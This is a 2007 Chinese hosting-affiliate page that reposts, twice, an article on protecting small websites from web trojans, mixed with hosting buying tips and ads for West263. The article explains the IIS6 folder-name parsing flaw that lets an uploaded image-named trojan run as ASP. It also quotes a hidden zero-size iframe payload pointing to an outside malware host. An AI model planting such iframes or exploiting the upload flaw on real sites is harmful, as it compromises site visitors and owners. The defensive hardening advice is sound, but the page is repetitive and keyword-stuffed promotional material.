虚拟主机
 您当前位置:特价虚拟主机联盟 -> 虚拟主机联盟>中小网站如何防止网页病毒和木马?
中小网站如何防止网页病毒和木马?
关于我们
全国虚拟主机联盟网是一个专门提供给网络用户在查找中小网站如何防止网页病毒和木马?的时候,能找到当地销售中小网站如何防止网页病毒和木马?最为便宜的服务商,我们经过各地收集的资料,邀请各地一级中小网站如何防止网页病毒和木马?服务商,并且是愿意薄利多销的公司进来参加联盟。我们致力查询最新的中小网站如何防止网页病毒和木马?打折和促销信息,终结中小网站如何防止网页病毒和木马?市场战国时代, 如果您从我们打折虚拟主机联盟所购买的虚拟主机价格不是最低的,请联系我们,我们立即更换这些虚拟主机服务商。让您找到最满意的中小网站如何防止网页病毒和木马?是我们的服务宗旨!
作者:未知 来源:未知
日期: 2007-8-8
在Google中搜索:因系统层出不穷的上传漏洞、注入漏洞、Win2003本身的设计缺陷,导致目前国内大多数的中小网站都存在或多或少的安全问题。加之很多网站管理员的安全水平有限,目前网页病毒木马非常猖獗。作为一家中小企业有必要搭建起一个管理企业网络的技术服务平台,以适应企业实现与国际竞争接轨、实现网络化和信息化的要求。当然,这也是日渐激烈的市场竞争,对中小企业“网管”的时代要求。

  Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。经测试,这个问题不限于asp,甚至php, CGI等都存在这种问题。

    目前国内大部分的网站都是运行在IIS6下,如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行,如果黑客将一个 hack.asp 文件改名为 hack.gif 上传到这些目录中,那么不堪设想。据悉,西部数码(http://www.west263.com)利用其技术优势,推出10重安全保障的虚拟主机,让菜鸟不再被木马困扰。 http://www.west263.com/AboutUs/ClearVirus.asp

   一,Stream开关可自由设置,ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。 Fso开关也可自由设置,FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。

  二,假设网站建好后,今后一段时间都不会再用到ftp上传功能,这时可以暂时关闭FTP上传,有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作空间内的文件,设置后60秒后生效。

  三,另外还可设置脚本权限与写入权限,如果网站只使用了asp,可设置为只开放asp权限。这样黑客即使上传了php的木马到空间也不能运行,最少的权限=最大的安全。写入权限设置则系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。

西部数码多重安全保障解决漏洞问题

   是否经常有人到论坛发些广告信息而感到烦恼?这时,它的作用产生了,可以明确拒绝或授权某些IP地址对网站的访问。对某些重要的子目录,如论坛的后台管理目录/admin/可以设置为所有人拒绝访问,只允许自己的ip访问.这样即使黑客知道了论坛的超级管理密码,也无法对论坛进行管理和破坏。重要文件还可设置保护,当文件被保护之后,该文件将无法从web访问。可以使用该功能来保护重要文件的安全性,比如ACCESS数据库等。

  是否担心被黑客攻击网站导致瘫痪?通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到空间也无法运行,这样就无法危及网站。  

   如果网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看网页源代码,会发现病毒代码一般是:<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等,而黑客通常会在网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入网站。使用西部数码提供的“病毒查杀”功能,可以批量清除木马代码,省去了先下载,再手工删除,再上传的麻烦,并且将这些病毒木马一网打尽。   
Google
站内搜索

网站栏目列表:

本站正在建设中,部分栏目尚未完全建成,更多信息正在陆续收集整理中,由此给您带来的不便,请谅解,谢谢!

如何选择中小网站如何防止网页病毒和木马?服务商

  几经辛苦,终于把自己的主页给设计完成好了,那么下一步就是 得为自己的网站在网上找一个家了。现在的互联网上的免费午餐似乎 已经被大家吃过了头,哎,做互联网已经很艰难了,更何况是更花钱的免费,所以,现在大家的面对现实了。


  现在免费的主页空间已经很难找了,大多已经是停止新的注册的,而且免费的主页大多会有许多限制,比如在空间,上传,访问量上等 等。我的个人意见是在网站完成的差不多的时候,最好能找到一个免费的主页空间来测试自己的网站,比如连接啊,效果啊等等,到真正完成的时候再找一个付费的。

  下面的内容只是我在建设我自己的和公司网站中关于中小网站如何防止网页病毒和木马? (IDC)选择的一些心得,都是付费的,如果你打算还是选择免费的虚拟空间的话,还是到互联网上搜索一下,或者是到论坛里面去问一些老鸟吧。

  一、量体裁衣,够用即可

  在选择中小网站如何防止网页病毒和木马?提供商之前,必须得为自己做的网站有一个全面 的认识。首先应该从内容和定位来考虑未来的访问量,如果是个人的 或者是公司的,访问量应该预计在一定的范围内,然后从访问量来选择需要的带宽和服务商提供的主机配置,太高了就会造成浪费。其次, 是空间和服务的选择,在我看来如果不是使用数据库技术访问的网站, 空间在30M 之内应该是够用,我看到许多服务商在最基础的服务上都会提示自己说提供起码100M的空间,实际上如果自己网站不包含数据 库或者大型的图库,那100M的空间可以说是浪费了许多,当然在考虑 空间的时候得全面考虑到以后的更新,换版之类的事情,因为一旦确定了空间,那就表示以后没办法升级了,只能在空间范围以内使用。 最后要考虑的是服务商,在上面的基础上,从收费和域名上选择,对于是否注册域名还是选择子域名,我的看法是尽量注册国际域名,毕竟便宜,如果是国际域名已经被人注册了就用国内的,但是最好不要注册中文或者是其他的什么.biz ,.cc之类的,它们在普及和域名解释上还会有或多或少的问题,如果是个人网站的话,可以考虑选 用子域名,毕竟网易或者是中国学生网之类的由原先免费提供转变的服务商,在收费上对于个人网站来说也是个很好的选择。

  二,货比三家,不怕麻烦

  相信许多人在确定了自己的需要之后,在寻找提供满足自己需要 的服务商上却头疼不已。要么服务商提供的服务对自己来说有点浪费,要么就是在价格上自己没办法接受。我的原则网站首先要保证的连接速度和稳定,在比较完中小网站如何防止网页病毒和木马?服务商上的价格后,最好去他们的一些客户的网站上看看,通过他们的客户的连接速度来观察他们服务质量,如果是服务质量上比较差的中小网站如何防止网页病毒和木马?服务商,不仅会在连接上比较慢,有时候还会经常出现域名解释上的错误,所以,观察他们的客户和到论坛上交流是很必要的。在最后确定了一两家服务商后,那么要做的事情就是如何和他们联系了,可以直接打电话或者写信来联系,比如多点咨询他们的服务条款,服务内容,还可以在价格上讨价还价,因为现在许多大型的中小网站如何防止网页病毒和木马?服务商为了扩大他们的收入,总是会有许多代理商,譬如通过广告的形式,吸引一些个人网站来为他们招揽客户,还有不少的个人网站也是他们的直接代理,而且代理上的价格可能还会便宜, 但是,我不推荐使用代理,因为通过代理来服务,毕竟中间多了个环节,如果以后出了问题,解决起来更麻烦,不过,既然出现了代理,那说明跟最终的服务商打交道的时候就有了讨价还价的余地了,所以最好是多写信,多讨价还价相信最后都会有少少的优惠,在这里,不 妨试一试下面的两招,第一招:说你在代理上看到价格是多少,或者是其他服务商的价格又是多少,在看看它的代理条款(看看给代理的 价格是多少(一般在大型IDC 上的“加盟我们”里面有),好让自己可以了解他们的底价是多少。第二招:可以拿一些其他的东西来吸引 你的中小网站如何防止网页病毒和木马?服务商为你优惠,譬如说你准备使用它两三年(而实际上先付一年的费用),或者说你想成为他们的代理,还可以说你可以介绍你的 朋友做为他的客户等等。这两招一出,一般都会获得不少的好处,至于能捞到多少就得看你的本事啦。

  三,微小细节,不可错过

  好了,经过一番努力后,终于最后确定了你的中小网站如何防止网页病毒和木马?服务商了,这时候 就到了交钱交货的阶段了,这时候,一定要注意一些细节问题,譬如 仔细研究你收到的服务条款,自己书写好你的注册信息,确保你的信息是准确正确的。在付款之后一定要保存单据,在收到密码要尽量更 改好密码。这些细节小事应该注意到,以免以后出现麻烦。

  四,选择信誉好、有品牌保证的服务商,不要为了便宜几块钱选择一个在行业里面一点知名度也没有的中小网站如何防止网页病毒和木马?服务商,根据我的经验,给大家推荐一个信誉不错的中小网站如何防止网页病毒和木马?服务商:西部数码 (http://www.west263.com) 我朋友的几个空间都是在西部数码买的,价格不贵,服务相当不错的!

西部数码-全国虚拟主机10强!20余项虚拟主机管理功能,全国领先!第6代双线路虚拟主机,南北访问畅通无阻!可在线rar解压,自动数据恢复设置虚拟目录等.免费赠送访问统计,企业邮局.Cn域名注册58元/年,空间150元起,免费试用7天,满意再付款!P4主机租用799元/月.月付免压金


相关链接:最新中国虚拟主机域名注册商排行榜

  好了,关于心得我就写到这了,希望大家都能为自己的网站找到一个温馨的“家”,也欢迎大家有空来我的家坐坐,http://something.6to23.com. 也欢迎大家写信跟我交流经验。
在Google中搜索:因系统层出不穷的上传漏洞、注入漏洞、Win2003本身的设计缺陷,导致目前国内大多数的中小网站都存在或多或少的安全问题。加之很多网站管理员的安全水平有限,目前网页病毒木马非常猖獗。作为一家中小企业有必要搭建起一个管理企业网络的技术服务平台,以适应企业实现与国际竞争接轨、实现网络化和信息化的要求。当然,这也是日渐激烈的市场竞争,对中小企业“网管”的时代要求。

  Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。经测试,这个问题不限于asp,甚至php, CGI等都存在这种问题。

    目前国内大部分的网站都是运行在IIS6下,如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行,如果黑客将一个 hack.asp 文件改名为 hack.gif 上传到这些目录中,那么不堪设想。据悉,西部数码(http://www.west263.com)利用其技术优势,推出10重安全保障的虚拟主机,让菜鸟不再被木马困扰。 http://www.west263.com/AboutUs/ClearVirus.asp

   一,Stream开关可自由设置,ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。 Fso开关也可自由设置,FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。

  二,假设网站建好后,今后一段时间都不会再用到ftp上传功能,这时可以暂时关闭FTP上传,有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作空间内的文件,设置后60秒后生效。

  三,另外还可设置脚本权限与写入权限,如果网站只使用了asp,可设置为只开放asp权限。这样黑客即使上传了php的木马到空间也不能运行,最少的权限=最大的安全。写入权限设置则系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。

西部数码多重安全保障解决漏洞问题

   是否经常有人到论坛发些广告信息而感到烦恼?这时,它的作用产生了,可以明确拒绝或授权某些IP地址对网站的访问。对某些重要的子目录,如论坛的后台管理目录/admin/可以设置为所有人拒绝访问,只允许自己的ip访问.这样即使黑客知道了论坛的超级管理密码,也无法对论坛进行管理和破坏。重要文件还可设置保护,当文件被保护之后,该文件将无法从web访问。可以使用该功能来保护重要文件的安全性,比如ACCESS数据库等。

  是否担心被黑客攻击网站导致瘫痪?通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到空间也无法运行,这样就无法危及网站。  

   如果网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看网页源代码,会发现病毒代码一般是:<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等,而黑客通常会在网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入网站。使用西部数码提供的“病毒查杀”功能,可以批量清除木马代码,省去了先下载,再手工删除,再上传的麻烦,并且将这些病毒木马一网打尽。   
Google

文章页数:[1] 

放大字体显示 缩小字体显示 打印文章 推荐给朋友
热门文章
·免费一级域名申请
·免费虚拟主机
·免费顶级域名申请
·收费空间
·免费主页空间
·免费虚拟空间
·广州虚拟主机
·网页在线播放器代码大全
·购买空间
·上海虚拟主机
最新文章
·中小网站如何防止网页病毒和木马?
·Digg创始人专访:这个IT社区怎么火起来的
·Google支票收取地址的写法
·14种网站最差的用户体验.(国内网站最常范的错误)
·中国五大域名注册商服务不完全比较
·网站站长基本掌握
·中国黑客界十大领袖人物
·ICP备案教程(图解)
·网页在线播放器代码大全
·优化网站的20条原则
友情连接
·西部数据
·VPS主机
版权申明:本站文章均来自网络,如有侵权,请联系我们,我们收到后立即删除,谢谢!

特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。本站正在建设中,部分栏目尚未完全建成,更多信息正在陆续收集整理中,由此给您带来的不便,请谅解,谢谢!
发表评论  打印  刷新  推荐给朋友  返回顶部  关闭

网上大名: